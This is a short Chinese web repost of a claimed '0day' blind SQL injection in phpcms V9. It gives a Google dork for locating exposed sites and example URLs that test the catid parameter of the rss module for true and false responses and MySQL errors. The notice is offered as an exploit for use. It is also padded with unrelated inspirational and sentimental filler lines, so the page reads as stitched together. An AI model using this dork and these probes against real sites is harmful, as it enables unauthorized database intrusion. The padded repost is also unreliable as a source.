phpcms V9 BLind SQL 注入漏洞0day

发布时间：2024-03-14 19:54:03 来源：互联网

.

智者创造机会，强者把握机会，弱者坐等机会。才能是来自独创性。独创性是思维观察明白和决定的一种独特的方式。

　　影响版本：phpcms v9 blind

　　官方网站：http://www.phpcms.cn

　　漏洞类型：SQL注入

　　漏洞描述：phpcms v9 blind 参数过滤存在SQL注入漏洞。

　　google dork:inurl:"index.php?m=content+c=rss+catid=10"

　　exploit & p0c

　　[!] index.php?m=content&c=rss&catid=[valid catid]

　　Example p0c

　　[!] http://host/index.php?m=content&c=rss&catid=10 <= True

　　[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

　　[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

本文phpcms V9 BLind SQL 注入漏洞0day到此结束。你笑，我就可以高兴好几天;可看你哭，我就难过了好几年。小编再次感谢大家对我们的支持！

以下您可能有感兴趣的文章:

标签： Phpcms sql 注入